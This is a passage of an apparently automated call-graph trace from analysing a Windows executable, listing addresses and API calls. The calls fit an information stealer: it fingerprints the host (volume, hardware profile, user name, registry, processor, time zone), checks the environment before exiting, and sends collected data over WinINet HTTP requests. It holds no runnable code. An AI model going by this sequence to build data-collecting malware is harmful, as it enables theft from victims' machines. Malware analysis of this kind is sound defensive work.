414368 59782->59783 59784 40feb0 2 API calls 59783->59784 59785 414391 59784->59785 59786 40feb0 2 API calls 59785->59786 59787 41439e 59786->59787 59788 40feb0 2 API calls 59787->59788 59789 4143ab 59788->59789 59790 40fe20 lstrcpy 59789->59790 59791 4143b8 59790->59791 59792 40fe20 lstrcpy 59791->59792 59793 4143c9 59792->59793 59794 40fe20 lstrcpy 59793->59794 59795 4143da 59794->59795 59796 40fe20 lstrcpy 59795->59796 59797 4143ee 59796->59797 59798 40fe20 lstrcpy 59797->59798 59799 4143ff 59798->59799 59800 40fe20 lstrcpy 59799->59800 59843 414413 59800->59843 59801 402480 lstrcpy 59801->59843 59803 4024e0 lstrcpy 59803->59843 59804 414637 StrCmpCA 59804->59843 59805 4146cc StrCmpCA 59806 4152a6 59805->59806 59805->59843 59807 40ff00 lstrcpy 59806->59807 59808 4152b2 59807->59808 60896 4024e0 59808->60896 59811 40ff00 lstrcpy 59813 4152cb 59811->59813 59812 41489f StrCmpCA 59814 415197 59812->59814 59812->59843 60899 402770 lstrcpy 59813->60899 59815 40ff00 lstrcpy 59814->59815 59816 4151a3 59815->59816 60894 402570 lstrcpy 59816->60894 59820 4152df 59823 40ff00 lstrcpy 59820->59823 59821 4151ac 59824 40ff00 lstrcpy 59821->59824 59822 414a8b StrCmpCA 59825 415085 59822->59825 59822->59843 59826 4152ef 59823->59826 59827 4151bc 59824->59827 59828 40ff00 lstrcpy 59825->59828 59831 40fe60 lstrcpy 59826->59831 60895 4027a0 lstrcpy 59827->60895 59829 415094 59828->59829 60892 402600 lstrcpy 59829->60892 59834 415308 59831->59834 59838 40fe60 lstrcpy 59834->59838 59835 4151d0 59839 40ff00 lstrcpy 59835->59839 59836 41509d 59840 40ff00 lstrcpy 59836->59840 59837 414c5e StrCmpCA 59842 414f70 59837->59842 59837->59843 59844 415318 59838->59844 59845 4151e0 59839->59845 59846 4150ad 59840->59846 59841 402510 lstrcpy 59841->59843 59847 40ff00 lstrcpy 59842->59847 59843->59801 59843->59803 59843->59804 59843->59805 59843->59812 59843->59822 59843->59837 59843->59841 59848 402600 lstrcpy 59843->59848 59849 413b80 29 API calls 59843->59849 59850 402630 lstrcpy 59843->59850 59853 41480a StrCmpCA 59843->59853 59861 402570 lstrcpy 59843->59861 59862 401120 lstrcpy 59843->59862 59866 414e3d StrCmpCA 59843->59866 59867 4025a0 lstrcpy 59843->59867 59873 40fe60 lstrcpy 59843->59873 59874 4026c0 lstrcpy 59843->59874 59877 4149e9 StrCmpCA 59843->59877 59889 40ff00 lstrcpy 59843->59889 59893 402720 lstrcpy 59843->59893 59895 414bc9 StrCmpCA 59843->59895 59899 402690 lstrcpy 59843->59899 59906 414da8 StrCmpCA 59843->59906 59911 413a40 24 API calls 59843->59911 60881 4024b0 59843->60881 60884 402540 lstrcpy 59843->60884 60885 4025d0 lstrcpy 59843->60885 60886 402660 lstrcpy 59843->60886 60887 4026f0 lstrcpy 59843->60887 59851 40fe60 lstrcpy 59844->59851 59854 40fe60 lstrcpy 59845->59854 60893 4027d0 lstrcpy 59846->60893 59852 414f7c 59847->59852 59848->59843 59849->59843 59850->59843 59913 414ee3 59851->59913 60890 402690 lstrcpy 59852->60890 59853->59843 59858 4151f9 59854->59858 59863 40fe60 lstrcpy 59858->59863 59859 4150c1 59864 40ff00 lstrcpy 59859->59864 59860 414f85 59865 40ff00 lstrcpy 59860->59865 59861->59843 59862->59843 59868 415209 59863->59868 59869 4150d1 59864->59869 59870 414f95 59865->59870 59871 414e58 59866->59871 59872 414e48 Sleep 59866->59872 59867->59843 59875 40fe60 lstrcpy 59868->59875 59881 40fe60 lstrcpy 59869->59881 60891 402800 lstrcpy 59870->60891 59876 40ff00 lstrcpy 59871->59876 59872->59843 59873->59843 59874->59843 59875->59913 59878 414e67 59876->59878 59877->59843 60888 402720 lstrcpy 59878->60888 59884 4150ea 59881->59884 59883 414fac 59886 40ff00 lstrcpy 59883->59886 59887 40fe60 lstrcpy 59884->59887 59885 414e70 59888 40ff00 lstrcpy 59885->59888 59890 414fbc 59886->59890 59891 4150fa 59887->59891 59892 414e80 59888->59892 59889->59843 59897 40fe60 lstrcpy 59890->59897 59894 40fe60 lstrcpy 59891->59894 60889 402830 lstrcpy 59892->60889 59893->59843 59894->59913 59895->59843 59900 414fd8 59897->59900 59898 414e97 59901 40ff00 lstrcpy 59898->59901 59899->59843 59902 40fe60 lstrcpy 59900->59902 59903 414ea7 59901->59903 59904 414fe8 59902->59904 59907 40fe60 lstrcpy 59903->59907 59905 40fe60 lstrcpy 59904->59905 59905->59913 59906->59843 59908 414ec3 59907->59908 59909 40fe60 lstrcpy 59908->59909 59910 414ed3 59909->59910 59912 40fe60 lstrcpy 59910->59912 59911->59843 59912->59913 59913->59034 59915 40fe77 59914->59915 59916 40fe8e 59915->59916 59917 40fe86 lstrcpy 59915->59917 59916->59047 59917->59916 59919 40ff9b 59918->59919 59920 40ffc5 59919->59920 59921 40ffb1 lstrcpy lstrcat 59919->59921 59920->59053 59921->59920 59922->59057 59924 40fe20 lstrcpy 59923->59924 59925 40246b 59924->59925 59926 410d30 GetWindowsDirectoryA 59925->59926 59927 410d72 59926->59927 59928 410d79 GetVolumeInformationA 59926->59928 59927->59928 59929 410db0 59928->59929 59930 410de6 GetProcessHeap HeapAlloc 59929->59930 59931 410e00 59930->59931 59932 410e1c wsprintfA lstrcat 59930->59932 59933 40fe20 lstrcpy 59931->59933 60900 410cd0 GetCurrentHwProfileA 59932->60900 59935 410e0b 59933->59935 59935->59063 59936 410e4f 59937 410e61 lstrlen 59936->59937 59938 410e76 59937->59938 60907 411b50 lstrcpy malloc strncpy 59938->60907 59940 410e80 59941 410e8e lstrcat 59940->59941 59942 410ea2 59941->59942 59943 40fe20 lstrcpy 59942->59943 59944 410eb5 59943->59944 59944->59063 59946 40fe60 lstrcpy 59945->59946 59947 404540 59946->59947 60908 404430 59947->60908 59949 40454c 59950 40fe20 lstrcpy 59949->59950 59951 40456d 59950->59951 59952 40fe20 lstrcpy 59951->59952 59953 404581 59952->59953 59954 40fe20 lstrcpy 59953->59954 59955 404592 59954->59955 59956 40fe20 lstrcpy 59955->59956 59957 4045a3 59956->59957 59958 40fe20 lstrcpy 59957->59958 59959 4045b4 59958->59959 59960 4045c9 InternetOpenA StrCmpCA 59959->59960 59961 4045f4 59960->59961 59962 404b68 InternetCloseHandle 59961->59962 60916 411450 59961->60916 59976 404b7a 59962->59976 59964 40460e 59965 40ff50 2 API calls 59964->59965 59966 404622 59965->59966 59967 40ff00 lstrcpy 59966->59967 59968 40462f 59967->59968 59969 40ffe0 3 API calls 59968->59969 59970 404657 59969->59970 59971 40ff00 lstrcpy 59970->59971 59972 404664 59971->59972 59973 40ffe0 3 API calls 59972->59973 59974 404680 59973->59974 59975 40ff00 lstrcpy 59974->59975 59977 40468d 59975->59977 59976->59067 59978 40ff50 2 API calls 59977->59978 59979 4046a8 59978->59979 59980 40ff00 lstrcpy 59979->59980 59981 4046b5 59980->59981 59982 40ffe0 3 API calls 59981->59982 59983 4046d1 59982->59983 59984 40ff00 lstrcpy 59983->59984 59985 4046de 59984->59985 59986 40ffe0 3 API calls 59985->59986 59987 4046fa 59986->59987 59988 40ff00 lstrcpy 59987->59988 59989 404707 59988->59989 59990 40ffe0 3 API calls 59989->59990 59991 404724 59990->59991 59992 40ff50 2 API calls 59991->59992 59993 404737 59992->59993 59994 40ff00 lstrcpy 59993->59994 59995 404744 59994->59995 59996 40475b InternetConnectA 59995->59996 59996->59962 59997 404787 HttpOpenRequestA 59996->59997 59998 4047c5 59997->59998 59999 404b5b InternetCloseHandle 59997->59999 60000 4047e1 59998->60000 60001 4047cb InternetSetOptionA 59998->60001 59999->59962 60002 40ffe0 3 API calls 60000->60002 60001->60000 60003 4047f2 60002->60003 60004 40ff00 lstrcpy 60003->60004 60005 4047ff 60004->60005 60006 40ff50 2 API calls 60005->60006 60007 40481a 60006->60007 60008 40ff00 lstrcpy 60007->60008 60009 404827 60008->60009 60010 40ffe0 3 API calls 60009->60010 60011 404843 60010->60011 60012 40ff00 lstrcpy 60011->60012 60013 404850 60012->60013 60014 40ffe0 3 API calls 60013->60014 60015 40486e 60014->60015 60016 40ff00 lstrcpy 60015->60016 60017 40487b 60016->60017 60018 40ffe0 3 API calls 60017->60018 60019 404897 60018->60019 60020 40ff00 lstrcpy 60019->60020 60021 4048a4 60020->60021 60022 40ffe0 3 API calls 60021->60022 60023 4048c0 60022->60023 60024 40ff00 lstrcpy 60023->60024 60025 4048cd 60024->60025 60026 40ff50 2 API calls 60025->60026 60027 4048e8 60026->60027 60028 40ff00 lstrcpy 60027->60028 60029 4048f5 60028->60029 60030 40ffe0 3 API calls 60029->60030 60031 404911 60030->60031 60032 40ff00 lstrcpy 60031->60032 60033 40491e 60032->60033 60034 40ffe0 3 API calls 60033->60034 60035 40493a 60034->60035 60036 40ff00 lstrcpy 60035->60036 60037 404947 60036->60037 60038 40ff50 2 API calls 60037->60038 60039 404962 60038->60039 60040 40ff00 lstrcpy 60039->60040 60041 40496f 60040->60041 60042 40ffe0 3 API calls 60041->60042 60043 40498b 60042->60043 60044 40ff00 lstrcpy 60043->60044 60045 404998 60044->60045 60046 40ffe0 3 API calls 60045->60046 60047 4049b6 60046->60047 60048 40ff00 lstrcpy 60047->60048 60049 4049c3 60048->60049 60050 40ffe0 3 API calls 60049->60050 60051 4049df 60050->60051 60052 40ff00 lstrcpy 60051->60052 60053 4049ec 60052->60053 60054 40ffe0 3 API calls 60053->60054 60055 404a08 60054->60055 60056 40ff00 lstrcpy 60055->60056 60057 404a15 60056->60057 60058 40ff50 2 API calls 60057->60058 60059 404a30 60058->60059 60060 40ff00 lstrcpy 60059->60060 60061 404a3d 60060->60061 60062 40fe20 lstrcpy 60061->60062 60063 404a55 60062->60063 60064 40ff50 2 API calls 60063->60064 60065 404a69 60064->60065 60066 40ff50 2 API calls 60065->60066 60067 404a7c 60066->60067 60068 40ff00 lstrcpy 60067->60068 60069 404a89 60068->60069 60070 404aa9 lstrlen 60069->60070 60071 404ab9 60070->60071 60072 404ac2 lstrlen 60071->60072 60922 4100c0 60072->60922 60074 404ad2 HttpSendRequestA InternetReadFile 60075 404af5 60074->60075 60076 404b49 InternetCloseHandle 60074->60076 60075->60076 60080 404afc 60075->60080 60923 40fea0 60076->60923 60078 40ffe0 3 API calls 60078->60080 60079 40ff00 lstrcpy 60079->60080 60080->60078 60080->60079 60081 404b2e InternetReadFile 60080->60081 60081->60075 60081->60076 60927 4100c0 60082->60927 60084 4127d7 StrCmpCA 60085 4127e2 ExitProcess 60084->60085 60086 4127e9 60084->60086 60087 4127f9 strtok_s 60086->60087 60088 41280a 60087->60088 60089 41294b 60087->60089 60090 41292f strtok_s 60088->60090 60091 4128e1 StrCmpCA 60088->60091 60092 412840 StrCmpCA 60088->60092 60093 4128a2 StrCmpCA 60088->60093 60094 412824 StrCmpCA 60088->60094 60095 4128b7 StrCmpCA 60088->60095 60096 4128f7 StrCmpCA 60088->60096 60097 412878 StrCmpCA 60088->60097 60098 41291b StrCmpCA 60088->60098 60099 41285c StrCmpCA 60088->60099 60100 4128cc StrCmpCA 60088->60100 60101 40feb0 2 API calls 60088->60101 60089->59069 60090->60088 60090->60089 60091->60090 60092->60088 60092->60090 60093->60088 60093->60090 60094->60088 60094->60090 60095->60088 60095->60090 60096->60090 60097->60088 60097->60090 60098->60090 60099->60088 60099->60090 60100->60088 60100->60090 60101->60088 60103 40fe60 lstrcpy 60102->60103 60104 405d20 60103->60104 60105 404430 5 API calls 60104->60105 60106 405d2c 60105->60106 60107 40fe20 lstrcpy 60106->60107 60108 405d4d 60107->60108 60109 40fe20 lstrcpy 60108->60109 60110 405d61 60109->60110 60111 40fe20 lstrcpy 60110->60111 60112 405d72 60111->60112 60113 40fe20 lstrcpy 60112->60113 60114 405d83 60113->60114 60115 40fe20 lstrcpy 60114->60115 60116 405d94 60115->60116 60117 405da9 InternetOpenA StrCmpCA 60116->60117 60118 405dd4 60117->60118 60119 4064bf InternetCloseHandle 60118->60119 60120 411450 2 API calls 60118->60120 60121 4064d5 60119->60121 60122 405dee 60120->60122 60934 406f50 CryptStringToBinaryA 60121->60934 60124 40ff50 2 API calls 60122->60124 60125 405e02 60124->60125 60127 40ff00 lstrcpy 60125->60127 60126 4064db 60128 40feb0 2 API calls 60126->60128 60143 406509 60126->60143 60131 405e0f 60127->60131 60129 4064ee 60128->60129 60130 40ffe0 3 API calls 60129->60130 60132 4064fd 60130->60132 60134 40ffe0 3 API calls 60131->60134 60133 40ff00 lstrcpy 60132->60133 60133->60143 60135 405e37 60134->60135 60136 40ff00 lstrcpy 60135->60136 60137 405e44 60136->60137 60138 40ffe0 3 API calls 60137->60138 60139 405e60 60138->60139 60140 40ff00 lstrcpy 60139->60140 60141 405e6d 60140->60141 60142 40ff50 2 API calls 60141->60142 60144 405e88 60142->60144 60143->59075 60145 40ff00 lstrcpy 60144->60145 60146 405e95 60145->60146 60147 40ffe0 3 API calls 60146->60147 60148 405eb1 60147->60148 60149 40ff00 lstrcpy 60148->60149 60150 405ebe 60149->60150 60151 40ffe0 3 API calls 60150->60151 60152 405eda 60151->60152 60153 40ff00 lstrcpy 60152->60153 60154 405ee7 60153->60154 60155 40ffe0 3 API calls 60154->60155 60156 405f04 60155->60156 60157 40ff50 2 API calls 60156->60157 60158 405f17 60157->60158 60159 40ff00 lstrcpy 60158->60159 60160 405f24 60159->60160 60161 405f3b InternetConnectA 60160->60161 60162 405f67 HttpOpenRequestA 60161->60162 60163 4064bc 60161->60163 60164 4064b5 InternetCloseHandle 60162->60164 60165 405fa5 60162->60165 60163->60119 60164->60163 60166 405fc1 60165->60166 60167 405fab InternetSetOptionA 60165->60167 60168 40ffe0 3 API calls 60166->60168 60167->60166 60169 405fd2 60168->60169 60170 40ff00 lstrcpy 60169->60170 60171 405fdf 60170->60171 60172 40ff50 2 API calls 60171->60172 60173 405ffa 60172->60173 60174 40ff00 lstrcpy 60173->60174 60175 406007 60174->60175 60176 40ffe0 3 API calls 60175->60176 60177 406023 60176->60177 60178 40ff00 lstrcpy 60177->60178 60179 406030 60178->60179 60180 40ffe0 3 API calls 60179->60180 60181 40604d 60180->60181 60182 40ff00 lstrcpy 60181->60182 60183 40605a 60182->60183 60184 40ffe0 3 API calls 60183->60184 60185 406078 60184->60185 60186 40ff00 lstrcpy 60185->60186 60187 406085 60186->60187 60188 40ffe0 3 API calls 60187->60188 60189 4060a1 60188->60189 60190 40ff00 lstrcpy 60189->60190 60191 4060ae 60190->60191 60192 40ff50 2 API calls 60191->60192 60193 4060c9 60192->60193 60194 40ff00 lstrcpy 60193->60194 60195 4060d6 60194->60195 60196 40ffe0 3 API calls 60195->60196 60197 4060f2 60196->60197 60198 40ff00 lstrcpy 60197->60198 60199 4060ff 60198->60199 60200 40ffe0 3 API calls 60199->60200 60201 40611b 60200->60201 60202 40ff00 lstrcpy 60201->60202 60203 406128 60202->60203 60204 40ff50 2 API calls 60203->60204 60205 406143 60204->60205 60206 40ff00 lstrcpy 60205->60206 60207 406150 60206->60207 60208 40ffe0 3 API calls 60207->60208 60209 40616c 60208->60209 60210 40ff00 lstrcpy 60209->60210 60211 406179 60210->60211 60212 40ffe0 3 API calls 60211->60212 60213 406196 60212->60213 60214 40ff00 lstrcpy 60213->60214 60215 4061a3 60214->60215 60216 40ffe0 3 API calls 60215->60216 60217 4061bf 60216->60217 60218 40ff00 lstrcpy 60217->60218 60219 4061cc 60218->60219 60220 40ffe0 3 API calls 60219->60220 60221 4061e8 60220->60221 60222 40ff00 lstrcpy 60221->60222 60223 4061f5 60222->60223 60224 402450 lstrcpy 60223->60224 60225 406209 60224->60225 60226 40ff50 2 API calls 60225->60226 60227 40621d 60226->60227 60228 40ff00 lstrcpy 60227->60228 60229 40622a 60228->60229 60230 40ffe0 3 API calls 60229->60230 60231 406252 60230->60231 60232 40ff00 lstrcpy 60231->60232 60233 40625f 60232->60233 60234 40ffe0 3 API calls 60233->60234 60235 40627b 60234->60235 60236 40ff00 lstrcpy 60235->60236 60237 406288 60236->60237 60238 40ff50 2 API calls 60237->60238 60239 4062a3 60238->60239 60240 40ff00 lstrcpy 60239->60240 60241 4062b0 60240->60241 60242 40ffe0 3 API calls 60241->60242 60243 4062cc 60242->60243 60244 40ff00 lstrcpy 60243->60244 60245 4062d9 60244->60245 60246 40ffe0 3 API calls 60245->60246 60247 4062f7 60246->60247 60248 40ff00 lstrcpy 60247->60248 60249 406304 60248->60249 60250 40ffe0 3 API calls 60249->60250 60251 406320 60250->60251 60252 40ff00 lstrcpy 60251->60252 60253 40632d 60252->60253 60254 40ffe0 3 API calls 60253->60254 60255 406349 60254->60255 60256 40ff00 lstrcpy 60255->60256 60257 406356 60256->60257 60258 40ff50 2 API calls 60257->60258 60259 406371 60258->60259 60260 40ff00 lstrcpy 60259->60260 60261 40637e 60260->60261 60262 406391 lstrlen 60261->60262 60928 4100c0 60262->60928 60264 4063a2 lstrlen GetProcessHeap HeapAlloc 60929 4100c0 60264->60929 60266 4063c5 lstrlen 60930 4100c0 60266->60930 60268 4063d5 memcpy 60931 4100c0 60268->60931 60270 4063e7 lstrlen 60271 4063f7 60270->60271 60272 406400 lstrlen memcpy 60271->60272 60932 4100c0 60272->60932 60274 40641c lstrlen 60933 4100c0 60274->60933 60276 40642c HttpSendRequestA InternetReadFile 60277 4064a8 InternetCloseHandle 60276->60277 60279 406452 60276->60279 60277->60164 60278 40ffe0 3 API calls 60278->60279 60279->60277 60279->60278 60280 40ff00 lstrcpy 60279->60280 60281 40648d InternetReadFile 60279->60281 60280->60279 60281->60277 60281->60279 60939 4100c0 60282->60939 60284 41218f strtok_s 60285 4121f9 60284->60285 60288 41219c 60284->60288 60285->59077 60286 40feb0 2 API calls 60287 4121e2 strtok_s 60286->60287 60287->60285 60287->60288 60288->60286 60288->60287 60289 40feb0 2 API calls 60288->60289 60289->60288 60940 4100c0 60290->60940 60292 411fdf strtok_s 60293 411ff0 60292->60293 60294 41210d 60292->60294 60295 4120f2 strtok_s 60293->60295 60296 4120c4 StrCmpCA 60293->60296 60297 412026 StrCmpCA 60293->60297 60298 412098 StrCmpCA 60293->60298 60299 41206c StrCmpCA 60293->60299 60300 40feb0 lstrlen lstrcpy 60293->60300 60294->59085 60295->60293 60295->60294 60296->60293 60297->60293 60298->60293 60299->60293 60300->60293 60302 40fe20 lstrcpy 60301->60302 60303 415693 60302->60303 60304 40ffe0 3 API calls 60303->60304 60305 4156a9 60304->60305 60306 40ff00 lstrcpy 60305->60306 60307 4156b6 60306->60307 60941 402420 60307->60941 60310 40ff50 2 API calls 60311 4156de 60310->60311 60312 40ff00 lstrcpy 60311->60312 60313 4156eb 60312->60313 60314 40ffe0 3 API calls 60313->60314 60315 415713 60314->60315 60316 40ff00 lstrcpy 60315->60316 60317 415720 60316->60317 60318 40ffe0 3 API calls 60317->60318 60319 41573c 60318->60319 60320 40ff00 lstrcpy 60319->60320 60321 415749 60320->60321 60322 40ffe0 3 API calls 60321->60322 60323 415765 60322->60323 60324 40ff00 lstrcpy 60323->60324 60325 415772 60324->60325 60944 4102a0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 60325->60944 60327 415782 60328 40ffe0 3 API calls 60327->60328 60329 41578f 60328->60329 60330 40ff00 lstrcpy 60329->60330 60331 41579c 60330->60331 60332 40ffe0 3 API calls 60331->60332 60333 4157b8 60332->60333 60334 40ff00 lstrcpy 60333->60334 60335 4157c5 60334->60335 60336 40ffe0 3 API calls 60335->60336 60337 4157e1 60336->60337 60338 40ff00 lstrcpy 60337->60338 60339 4157ee 60338->60339 60945 410c30 memset RegOpenKeyExA 60339->60945 60341 4157fe 60342 40ffe0 3 API calls 60341->60342 60343 41580b 60342->60343 60344 40ff00 lstrcpy 60343->60344 60345 415818 60344->60345 60346 40ffe0 3 API calls 60345->60346 60347 415834 60346->60347 60348 40ff00 lstrcpy 60347->60348 60349 415841 60348->60349 60350 40ffe0 3 API calls 60349->60350 60351 41585d 60350->60351 60352 40ff00 lstrcpy 60351->60352 60353 41586a 60352->60353 60354 410cd0 2 API calls 60353->60354 60355 41587e 60354->60355 60356 40ff50 2 API calls 60355->60356 60357 415892 60356->60357 60358 40ff00 lstrcpy 60357->60358 60359 41589f 60358->60359 60360 40ffe0 3 API calls 60359->60360 60361 4158c7 60360->60361 60362 40ff00 lstrcpy 60361->60362 60363 4158d4 60362->60363 60364 40ffe0 3 API calls 60363->60364 60365 4158f0 60364->60365 60366 40ff00 lstrcpy 60365->60366 60367 4158fd 60366->60367 60368 410d30 12 API calls 60367->60368 60369 415911 60368->60369 60370 40ff50 2 API calls 60369->60370 60371 415925 60370->60371 60372 40ff00 lstrcpy 60371->60372 60373 415932 60372->60373 60374 40ffe0 3 API calls 60373->60374 60375 41595a 60374->60375 60376 40ff00 lstrcpy 60375->60376 60377 415967 60376->60377 60378 40ffe0 3 API calls 60377->60378 60379 415983 60378->60379 60380 40ff00 lstrcpy 60379->60380 60381 415990 60380->60381 60382 41599b GetCurrentProcessId 60381->60382 60949 4119c0 OpenProcess 60382->60949 60385 40ff50 2 API calls 60386 4159bf 60385->60386 60387 40ff00 lstrcpy 60386->60387 60388 4159cc 60387->60388 60389 40ffe0 3 API calls 60388->60389 60390 4159f4 60389->60390 60391 40ff00 lstrcpy 60390->60391 60392 415a01 60391->60392 60393 40ffe0 3 API calls 60392->60393 60394 415a1d 60393->60394 60395 40ff00 lstrcpy 60394->60395 60396 415a2a 60395->60396 60397 40ffe0 3 API calls 60396->60397 60398 415a46 60397->60398 60399 40ff00 lstrcpy 60398->60399 60400 415a53 60399->60400 60401 40ffe0 3 API calls 60400->60401 60402 415a6f 60401->60402 60403 40ff00 lstrcpy 60402->60403 60404 415a7c 60403->60404 60954 410ee0 GetProcessHeap HeapAlloc 60404->60954 60406 415a8c 60407 40ffe0 3 API calls 60406->60407 60408 415a99 60407->60408 60409 40ff00 lstrcpy 60408->60409 60410 415aa6 60409->60410 60411 40ffe0 3 API calls 60410->60411 60412 415ac2 60411->60412 60413 40ff00 lstrcpy 60412->60413 60414 415acf 60413->60414 60415 40ffe0 3 API calls 60414->60415 60416 415aeb 60415->60416 60417 40ff00 lstrcpy 60416->60417 60418 415af8 60417->60418 60961 411020 CoInitializeEx CoInitializeSecurity CoCreateInstance 60418->60961 60420 415b0c 60421 40ff50 2 API calls 60420->60421 60422 415b20 60421->60422 60423 40ff00 lstrcpy 60422->60423 60424 415b2d 60423->60424 60425 40ffe0 3 API calls 60424->60425 60426 415b55 60425->60426 60427 40ff00 lstrcpy 60426->60427 60428 415b62 60427->60428 60429 40ffe0 3 API calls 60428->60429 60430 415b7e 60429->60430 60431 40ff00 lstrcpy 60430->60431 60432 415b8b 60431->60432 60975 4111e0 CoInitializeEx CoInitializeSecurity CoCreateInstance 60432->60975 60434 415b9f 60435 40ff50 2 API calls 60434->60435 60436 415bb3 60435->60436 60437 40ff00 lstrcpy 60436->60437 60438 415bc0 60437->60438 60439 40ffe0 3 API calls 60438->60439 60440 415be8 60439->60440 60441 40ff00 lstrcpy 60440->60441 60442 415bf5 60441->60442 60443 40ffe0 3 API calls 60442->60443 60444 415c11 60443->60444 60445 40ff00 lstrcpy 60444->60445 60446 415c1e 60445->60446 60447 410260 3 API calls 60446->60447 60448 415c2e 60447->60448 60449 40ffe0 3 API calls 60448->60449 60450 415c3b 60449->60450 60451 40ff00 lstrcpy 60450->60451 60452 415c48 60451->60452 60453 40ffe0 3 API calls 60452->60453 60454 415c64 60453->60454 60455 40ff00 lstrcpy 60454->60455 60456 415c71 60455->60456 60457 40ffe0 3 API calls 60456->60457 60458 415c8d 60457->60458 60459 40ff00 lstrcpy 60458->60459 60460 415c9a 60459->60460 60989 410220 GetProcessHeap HeapAlloc GetUserNameA 60460->60989 60462 415caa 60463 40ffe0 3 API calls 60462->60463 60464 415cb7 60463->60464 60465 40ff00 lstrcpy 60464->60465 60466 415cc4 60465->60466 60467 40ffe0 3 API calls 60466->60467 60468 415ce0 60467->60468 60469 40ff00 lstrcpy 60468->60469 60470 415ced 60469->60470 60471 40ffe0 3 API calls 60470->60471 60472 415d09 60471->60472 60473 40ff00 lstrcpy 60472->60473 60474 415d16 60473->60474 60990 410bb0 7 API calls 60474->60990 60477 40ff50 2 API calls 60478 415d3e 60477->60478 60479 40ff00 lstrcpy 60478->60479 60480 415d4b 60479->60480 60481 40ffe0 3 API calls 60480->60481 60482 415d73 60481->60482 60483 40ff00 lstrcpy 60482->60483 60484 415d80 60483->60484 60485 40ffe0 3 API calls 60484->60485 60486 415d9c 60485->60486 60487 40ff00 lstrcpy 60486->60487 60488 415da9 60487->60488 60993 410370 60488->60993 60491 40ff50 2 API calls 60492 415dd4 60491->60492 60493 40ff00 lstrcpy 60492->60493 60494 415de1 60493->60494 60495 40ffe0 3 API calls 60494->60495 60496 415e0f 60495->60496 60497 40ff00 lstrcpy 60496->60497 60498 415e1c 60497->60498 60499 40ffe0 3 API calls 60498->60499 60500 415e3b 60499->60500 60501 40ff00 lstrcpy 60500->60501 60502 415e48 60501->60502 61003 4102a0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 60502->61003 60504 415e58 60505 40ffe0 3 API calls 60504->60505 60506 415e65 60505->60506 60507 40ff00 lstrcpy 60506->60507 60508 415e72 60507->60508 60509 40ffe0 3 API calls 60508->60509 60510 415e91 60509->60510 60511 40ff00 lstrcpy 60510->60511 60512 415e9e 60511->60512 60513 40ffe0 3 API calls 60512->60513 60514 415ec0 60513->60514 60515 40ff00 lstrcpy 60514->60515 60516 415ecd 60515->60516 61004 410300 GetProcessHeap HeapAlloc GetTimeZoneInformation 60516->61004 60519 40ffe0 3 API calls 60520 415ef0 60519->60520 60521 40ff00 lstrcpy 60520->60521 60522 415efd 60521->60522 60523 40ffe0 3 API calls 60522->60523 60524 415f1f 60523->60524 60525 40ff00 lstrcpy 60524->60525 60526 415f2c 60525->60526 60527 40ffe0 3 API calls 60526->60527 60528 415f4e 60527->60528 60529 40ff00 lstrcpy 60528->60529 60530 415f5b 60529->60530 60531 40ffe0 3 API calls 60530->60531 60532 415f7d 60531->60532 60533 40ff00 lstrcpy 60532->60533 60534 415f8a 60533->60534 61007 4104d0 GetProcessHeap HeapAlloc RegOpenKeyExA 60534->61007 60537 40ffe0 3 API calls 60538 415fad 60537->60538 60539 40ff00 lstrcpy 60538->60539 60540 415fba 60539->60540 60541 40ffe0 3 API calls 60540->60541 60542 415fdc 60541->60542 60543 40ff00 lstrcpy 60542->60543 60544 415fe9 60543->60544 60545 40ffe0 3 API calls 60544->60545 60546 416008 60545->60546 60547 40ff00 lstrcpy 60546->60547 60548 416015 60547->60548 61010 410580 GetLogicalProcessorInformationEx 60548->61010 60550 416025 60551 40ffe0 3 API calls 60550->60551 60552 416032 60551->60552 60553 40ff00 lstrcpy 60552->60553 60554 41603f 60553->60554 60555 40ffe0 3 API calls 60554->60555 60556 41605e 60555->60556 60557 40ff00 lstrcpy 60556->60557 60558 41606b 60557->60558 60559 40ffe0 3 API calls 60558->60559 60560 41608a 60559->60560 60561 40ff00 lstrcpy 60560->60561 60562 416097 60561->60562 61026 410540 GetSystemInfo wsprintfA 60562->61026 60564 4160a7 60565 40ffe0 3 API calls 60564->60565 60566 4160b4 60565->60566 60567 40ff00 lstrcpy 60566->60567 60568 4160c1 60567->60568 60569 40ffe0 3 API calls 60568->60569 60570 4160e0 60569->60570 60571 40ff00 lstrcpy 60570->60571 60572 4160ed 60571->60572 60573 40ffe0 3 API calls 60572->60573 60574 41610c 60573->60574 60575 40ff00 lstrcpy 60574->60575 60576 416119 60575->60576 61027 410680 GetProcessHeap HeapAlloc 60576->61027 60578 416129 60579 40ffe0 3 API calls 60578->60579 60580 416136 60579->60580 60581 40ff00 lstrcpy 60580->60581 60582 416143 60581->60582 60583 40ffe0 3 API calls 60582->60583 60584 416162 60583->60584 60585 40ff00 lstrcpy 60584->60585 60586 41616f 60585->60586 60587 40ffe0 3 API calls 60586->60587 60588 416191 60587->60588 60589 40ff00 lstrcpy 60588->60589 60590 41619e 60589->60590 60591 40ffe0 3 API calls 60590->60591 60592 4161c0 60591->60592 60593 40ff00 lstrcpy 60592->60593 60594 4161cd 60593->60594 61032 4106f0 60594->61032 60597 40ff50 2 API calls 60598 4161fe 60597->60598 60599 40ff00 lstrcpy 60598->60599 60600 41620b 60599->60600 60601 40ffe0 3 API calls 60600->60601 60602 41623c 60601->60602 60603 40ff00 lstrcpy 60602->60603 60604 416249 60603->60604 60605 40ffe0 3 API calls 60604->60605 60606 41626b 60605->60606 60607 40ff00 lstrcpy 60606->60607 60608 416278 60607->60608 61040 410aa0 60608->61040 60610 416292 60611 40ff50 2 API calls 60610->60611 60612 4162a9 60611->60612 60613 40ff00 lstrcpy 60612->60613 60614 4162b6 60613->60614 60615 40ffe0 3 API calls 60614->60615 60616 4162e7 60615->60616 60617 40ff00 lstrcpy 60616->60617 60618 4162f4 60617->60618 60619 40ffe0 3 API calls 60618->60619 60620 416316 60619->60620 60621 40ff00 lstrcpy 60620->60621 60622 416323 60621->60622 61049 410800 60622->61049 60624 416342 60625 40ff50 2 API calls 60624->60625 60626 416359 60625->60626 60627 40ff00 lstrcpy 60626->60627 60628 416366 60627->60628 60629 410800 13 API calls 60628->60629 60630 416394 60629->60630 60631 40ff50 2 API calls 60630->60631 60632 4163ab 60631->60632 60633 40ff00 lstrcpy 60632->60633 60634 4163b8 60633->60634 60635 40ffe0 3 API calls 60634->60635 60636 4163e6 60635->60636 60637 40ff00 lstrcpy 60636->60637 60638 4163f3 60637->60638 60639 416406 lstrlen 60638->60639 60640 416416 60639->60640 60641 